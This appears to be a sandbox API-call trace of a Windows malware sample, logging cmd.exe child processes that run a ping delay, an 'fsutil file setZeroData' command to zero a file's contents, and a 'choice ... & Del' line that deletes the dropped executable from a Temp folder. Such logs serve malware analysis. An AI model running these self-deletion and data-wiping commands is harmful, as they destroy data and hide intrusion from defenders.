1 [0258.015] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x2cee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee68) returned 0xffffffff [0258.015] GetLastError () returned 0x2 [0258.015] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee68) returned 0x2d1200 [0258.015] GetProcessHeap () returned 0x2d0000 [0258.016] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e3668, Size=0x4) returned 0x2e3668 [0258.016] FindClose (in: hFindFile=0x2d1200 | out: hFindFile=0x2d1200) returned 1 [0258.016] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0258.016] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0258.016] GetConsoleTitleW (in: lpConsoleTitle=0x2cf360, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0258.075] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf1e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf2b0 | out: lpAttributeList=0x2cf1e8, lpSize=0x2cf2b0) returned 1 [0258.075] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf1e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf2a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf1e8, lpPreviousValue=0x0) returned 1 [0258.075] GetStartupInfoW (in: lpStartupInfo=0x2cf1a4 | out: lpStartupInfo=0x2cf1a4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0)) [0258.075] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0258.077] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping 127.0.0.7 -n 3 ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x2cf244*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping 127.0.0.7 -n 3 ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf290 | out: lpCommandLine="ping 127.0.0.7 -n 3 ", lpProcessInformation=0x2cf290*(hProcess=0x7c, hThread=0x78, dwProcessId=0xc9c, dwThreadId=0xed4)) returned 1 [0258.408] CloseHandle (hObject=0x78) returned 1 [0258.408] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0258.408] GetProcessHeap () returned 0x2d0000 [0258.408] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e57d0 | out: hHeap=0x2d0000) returned 1 [0258.408] GetEnvironmentStringsW () returned 0x2e4590* [0258.408] GetProcessHeap () returned 0x2d0000 [0258.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb5e) returned 0x2e50f8 [0258.408] FreeEnvironmentStringsW (penv=0x2e4590) returned 1 [0258.408] WaitForSingleObject (hHandle=0x7c, dwMilliseconds=0xffffffff) returned 0x0 [0261.381] GetExitCodeProcess (in: hProcess=0x7c, lpExitCode=0x2cf184 | out: lpExitCode=0x2cf184*=0x0) returned 1 [0261.381] CloseHandle (hObject=0x7c) returned 1 [0261.381] _vsnwprintf (in: _Buffer=0x2cf2cc, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf190 | out: _Buffer="00000000") returned 8 [0261.381] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0261.381] GetProcessHeap () returned 0x2d0000 [0261.381] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e50f8 | out: hHeap=0x2d0000) returned 1 [0261.381] GetEnvironmentStringsW () returned 0x2e4590* [0261.381] GetProcessHeap () returned 0x2d0000 [0261.382] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb84) returned 0x2e5120 [0261.382] FreeEnvironmentStringsW (penv=0x2e4590) returned 1 [0261.382] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0261.382] GetProcessHeap () returned 0x2d0000 [0261.382] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5120 | out: hHeap=0x2d0000) returned 1 [0261.382] GetEnvironmentStringsW () returned 0x2e4590* [0261.382] GetProcessHeap () returned 0x2d0000 [0261.382] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb84) returned 0x2e5120 [0261.382] FreeEnvironmentStringsW (penv=0x2e4590) returned 1 [0261.382] GetProcessHeap () returned 0x2d0000 [0261.382] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2df7d8 | out: hHeap=0x2d0000) returned 1 [0261.382] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf1e8 | out: lpAttributeList=0x2cf1e8) [0261.382] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0261.382] _close (_FileHandle=3) returned 0 [0261.382] GetConsoleTitleW (in: lpConsoleTitle=0x2cf568, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0261.382] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2e5ed0, lpFilePart=0x2cf088 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x2cf088*="Temp") returned 0x39 [0261.383] SetErrorMode (uMode=0x0) returned 0x1 [0261.383] GetProcessHeap () returned 0x2d0000 [0261.383] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e5ec8, Size=0x8a) returned 0x2e5ec8 [0261.383] GetProcessHeap () returned 0x2d0000 [0261.383] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5ec8) returned 0x8a [0261.383] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a6f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0261.383] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0261.383] GetProcessHeap () returned 0x2d0000 [0261.383] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x148) returned 0x2e5f60 [0261.383] GetProcessHeap () returned 0x2d0000 [0261.383] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x288) returned 0x2e22f8 [0261.383] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e22f8, Size=0x14a) returned 0x2e22f8 [0261.383] GetProcessHeap () returned 0x2d0000 [0261.383] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e22f8) returned 0x14a [0261.383] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a6f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0261.383] GetProcessHeap () returned 0x2d0000 [0261.383] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xe0) returned 0x2e60b0 [0261.383] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e60b0, Size=0x76) returned 0x2e60b0 [0261.383] GetProcessHeap () returned 0x2d0000 [0261.383] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e60b0) returned 0x76 [0261.383] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0261.383] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\fsutil.*", fInfoLevelId=0x1, lpFindFileData=0x2cee04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee04) returned 0xffffffff [0261.384] GetLastError () returned 0x2 [0261.384] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\fsutil", fInfoLevelId=0x1, lpFindFileData=0x2cee04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee04) returned 0xffffffff [0261.384] GetLastError () returned 0x2 [0261.384] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0261.384] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\fsutil.*", fInfoLevelId=0x1, lpFindFileData=0x2cee04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee04) returned 0x2df458 [0261.384] FindClose (in: hFindFile=0x2df458 | out: hFindFile=0x2df458) returned 1 [0261.384] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\fsutil.COM", fInfoLevelId=0x1, lpFindFileData=0x2cee04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee04) returned 0xffffffff [0261.384] GetLastError () returned 0x2 [0261.384] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\fsutil.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cee04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee04) returned 0x2df458 [0261.385] FindClose (in: hFindFile=0x2df458 | out: hFindFile=0x2df458) returned 1 [0261.385] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0261.385] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0261.385] GetConsoleTitleW (in: lpConsoleTitle=0x2cf2fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0261.385] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf184, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf24c | out: lpAttributeList=0x2cf184, lpSize=0x2cf24c) returned 1 [0261.385] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf184, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf244, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf184, lpPreviousValue=0x0) returned 1 [0261.385] GetStartupInfoW (in: lpStartupInfo=0x2cf140 | out: lpStartupInfo=0x2cf140*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0)) [0261.385] lstrcmpW (lpString1="\\fsutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0261.385] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\fsutil.exe", lpCommandLine="fsutil file setZeroData offset=0 length=524288 “%s” ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x2cf1e0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="fsutil file setZeroData offset=0 length=524288 “%s” ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf22c | out: lpCommandLine="fsutil file setZeroData offset=0 length=524288 “%s” ", lpProcessInformation=0x2cf22c*(hProcess=0x7c, hThread=0x74, dwProcessId=0x1334, dwThreadId=0x13c0)) returned 1 [0261.469] CloseHandle (hObject=0x74) returned 1 [0261.469] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0261.470] GetProcessHeap () returned 0x2d0000 [0261.470] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5120 | out: hHeap=0x2d0000) returned 1 [0261.470] GetEnvironmentStringsW () returned 0x2e4590* [0261.470] GetProcessHeap () returned 0x2d0000 [0261.470] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb84) returned 0x2e5120 [0261.470] FreeEnvironmentStringsW (penv=0x2e4590) returned 1 [0261.470] WaitForSingleObject (hHandle=0x7c, dwMilliseconds=0xffffffff) returned 0x0 [0261.930] GetExitCodeProcess (in: hProcess=0x7c, lpExitCode=0x2cf120 | out: lpExitCode=0x2cf120*=0x1) returned 1 [0261.930] CloseHandle (hObject=0x7c) returned 1 [0261.930] _vsnwprintf (in: _Buffer=0x2cf268, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf12c | out: _Buffer="00000001") returned 8 [0261.930] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0261.930] GetProcessHeap () returned 0x2d0000 [0261.930] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5120 | out: hHeap=0x2d0000) returned 1 [0261.931] GetEnvironmentStringsW () returned 0x2e4590* [0261.931] GetProcessHeap () returned 0x2d0000 [0261.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb84) returned 0x2e5120 [0261.931] FreeEnvironmentStringsW (penv=0x2e4590) returned 1 [0261.931] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0261.931] GetProcessHeap () returned 0x2d0000 [0261.931] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5120 | out: hHeap=0x2d0000) returned 1 [0261.931] GetEnvironmentStringsW () returned 0x2e4590* [0261.931] GetProcessHeap () returned 0x2d0000 [0261.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb84) returned 0x2e5120 [0261.931] FreeEnvironmentStringsW (penv=0x2e4590) returned 1 [0261.931] GetProcessHeap () returned 0x2d0000 [0261.931] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2df7d8 | out: hHeap=0x2d0000) returned 1 [0261.931] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf184 | out: lpAttributeList=0x2cf184) [0261.931] GetConsoleTitleW (in: lpConsoleTitle=0x2cf568, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0261.931] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2df458, Size=0x24) returned 0x2df458 [0261.931] GetProcessHeap () returned 0x2d0000 [0261.932] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2df458) returned 0x24 [0261.932] GetProcessHeap () returned 0x2d0000 [0261.932] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x38) returned 0x2d1250 [0261.932] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2d1250, Size=0x24) returned 0x2d1250 [0261.932] GetProcessHeap () returned 0x2d0000 [0261.932] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2d1250) returned 0x24 [0261.932] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x2cf320 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0261.932] GetProcessHeap () returned 0x2d0000 [0261.932] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x38) returned 0x2e4350 [0261.932] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x2ce3b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0261.932] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ce5e0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x2ce5e4, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ce5e0*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0261.933] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0261.933] GetProcessHeap () returned 0x2d0000 [0261.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2c) returned 0x2e4390 [0261.933] GetProcessHeap () returned 0x2d0000 [0261.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x258) returned 0x2e2450 [0261.933] _wcsicmp (_String1="“%s”", _String2=".") returned 8174 [0261.933] _wcsicmp (_String1="“%s”", _String2="..") returned 8174 [0261.933] GetFileAttributesW (lpFileName="“%s”" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp\\“%s”")) returned 0xffffffff [0261.933] GetLastError () returned 0x2 [0261.933] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2e26b8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0261.934] GetFullPathNameW (in: lpFileName="“%s”", nBufferLength=0x104, lpBuffer=0x2cea04, lpFilePart=0x2ce9ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\“%s”", lpFilePart=0x2ce9ec*="“%s”") returned 0x3e [0261.934] SetErrorMode (uMode=0x0) returned 0x1 [0261.934] GetProcessHeap () returned 0x2d0000 [0261.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x258) returned 0x2e28c8 [0261.934] _wcsicmp (_String1="“%s”", _String2=".") returned 8174 [0261.934] _wcsicmp (_String1="“%s”", _String2="..") returned 8174 [0261.934] GetFileAttributesW (lpFileName="“%s”" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp\\“%s”")) returned 0xffffffff [0261.934] GetLastError () returned 0x2 [0261.934] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\“%s”", fInfoLevelId=0x0, lpFindFileData=0x2e459c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2e459c) returned 0xffffffff [0261.934] GetLastError () returned 0x2 [0261.935] _get_osfhandle (_FileHandle=2) returned 0xfffffffe [0261.935] GetFileType (hFile=0xfffffffe) returned 0x0 [0261.935] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a6f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0261.935] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a6f4640, nSize=0x2000, Arguments=0x2cf054 | out: lpBuffer="Could Not Find C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\“%s”\r\n") returned 0x4f [0261.935] _get_osfhandle (_FileHandle=2) returned 0xfffffffe [0261.935] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Could Not Find C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\“%s”\r\n", cchWideChar=-1, lpMultiByteStr=0x4a6e6640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Could Not Find C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\\"%s\"\r\n", lpUsedDefaultChar=0x0) returned 80 [0261.936] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x4a6e6640, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x2cf02c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cf02c, lpOverlapped=0x0) returned 0 [0261.936] GetLastError () returned 0x6 [0261.936] exit (_Code=1) Process: id = "562" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2b978000" os_pid = "0xfe8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" \"/C choice /C Y /N /D Y /T 3 & Del \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1410 os_tid = 0x115c [0257.911] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ffc5c | out: lpSystemTimeAsFileTime=0x2ffc5c*(dwLowDateTime=0x6a5da750, dwHighDateTime=0x1d6f0d1)) [0257.911] GetCurrentProcessId () returned 0xfe8 [0257.911] GetCurrentThreadId () returned 0x115c [0257.911] GetTickCount () returned 0x1171ad1 [0257.911] QueryPerformanceCounter (in: lpPerformanceCount=0x2ffc54 | out: lpPerformanceCount=0x2ffc54*=37701229032) returned 1 [0257.913] GetModuleHandleA (lpModuleName=0x0) returned 0x4a6c0000 [0257.913] __set_app_type (_Type=0x1) [0257.913] __p__fmode () returned 0x770331f4 [0257.913] __p__commode () returned 0x770331fc [0257.913] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a6e21a6) returned 0x0 [0257.914] __getmainargs (in: _Argc=0x4a6e4238, _Argv=0x4a6e4240, _Env=0x4a6e423c, _DoWildCard=0, _StartInfo=0x4a6e4140 | out: _Argc=0x4a6e4238, _Argv=0x4a6e4240, _Env=0x4a6e423c) returned 0 [0257.914] GetCurrentThreadId () returned 0x115c [0257.914] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x115c) returned 0x60 [0257.914] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0257.914] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0257.914] SetThreadUILanguage (LangId=0x0) returned 0x409 [0257.915] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0257.915] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ffbec | out: phkResult=0x2ffbec*=0x0) returned 0x2 [0257.915] VirtualQuery (in: lpAddress=0x2ffc23, lpBuffer=0x2ffbbc, dwLength=0x1c | out: lpBuffer=0x2ffbbc*(BaseAddress=0x2ff000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0257.915] VirtualQuery (in: lpAddress=0x200000, lpBuffer=0x2ffbbc, dwLength=0x1c | out: lpBuffer=0x2ffbbc*(BaseAddress=0x200000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0257.915] VirtualQuery (in: lpAddress=0x201000, lpBuffer=0x2ffbbc, dwLength=0x1c | out: lpBuffer=0x2ffbbc*(BaseAddress=0x201000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0257.915] VirtualQuery (in: lpAddress=0x203000, lpBuffer=0x2ffbbc, dwLength=0x1c | out: lpBuffer=0x2ffbbc*(BaseAddress=0x203000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0257.915] VirtualQuery (in: lpAddress=0x300000, lpBuffer=0x2ffbbc, dwLength=0x1c | out: lpBuffer=0x2ffbbc*(BaseAddress=0x300000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x110000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0257.915] GetConsoleOutputCP () returned 0x1b5 [0257.915] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6e4260 | out: lpCPInfo=0x4a6e4260) returned 1 [0257.916] SetConsoleCtrlHandler (HandlerRoutine=0x4a6de72a, Add=1) returned 1 [0257.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0257.916] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0257.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0257.916] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a6e41ac | out: lpMode=0x4a6e41ac) returned 1 [0257.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0257.917] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0257.917] _get_osfhandle (_FileHandle=0) returned 0x3 [0257.917] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a6e41b0 | out: lpMode=0x4a6e41b0) returned 1 [0257.917] _get_osfhandle (_FileHandle=0) returned 0x3 [0257.917] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0257.917] GetEnvironmentStringsW () returned 0x6f2140* [0257.918] GetProcessHeap () returned 0x6e0000 [0257.918] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xaca) returned 0x6f2c18 [0257.918] FreeEnvironmentStringsW (penv=0x6f2140) returned 1 [0257.918] GetProcessHeap () returned 0x6e0000 [0257.918] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x4) returned 0x6f18e0 [0257.918] GetEnvironmentStringsW () returned 0x6f2140* [0257.918] GetProcessHeap () returned 0x6e0000 [0257.918] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xaca) returned 0x6f36f0 [0257.918] FreeEnvironmentStringsW (penv=0x6f2140) returned 1 [0257.918] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2feb5c | out: phkResult=0x2feb5c*=0x68) returned 0x0 [0257.918] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2feb64, lpData=0x2feb68, lpcbData=0x2feb60*=0x1000 | out: lpType=0x2feb64*=0x0, lpData=0x2feb68*=0x0, lpcbData=0x2feb60*=0x1000) returned 0x2 [0257.918] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2feb64, lpData=0x2feb68, lpcbData=0x2feb60*=0x1000 | out: lpType=0x2feb64*=0x4, lpData=0x2feb68*=0x1, lpcbData=0x2feb60*=0x4) returned 0x0 [0257.918] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2feb64, lpData=0x2feb68, lpcbData=0x2feb60*=0x1000 | out: lpType=0x2feb64*=0x0, lpData=0x2feb68*=0x1, lpcbData=0x2feb60*=0x1000) returned 0x2 [0257.919] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2feb64, lpData=0x2feb68, lpcbData=0x2feb60*=0x1000 | out: lpType=0x2feb64*=0x4, lpData=0x2feb68*=0x0, lpcbData=0x2feb60*=0x4) returned 0x0 [0257.919] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2feb64, lpData=0x2feb68, lpcbData=0x2feb60*=0x1000 | out: lpType=0x2feb64*=0x4, lpData=0x2feb68*=0x40, lpcbData=0x2feb60*=0x4) returned 0x0 [0257.919] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2feb64, lpData=0x2feb68, 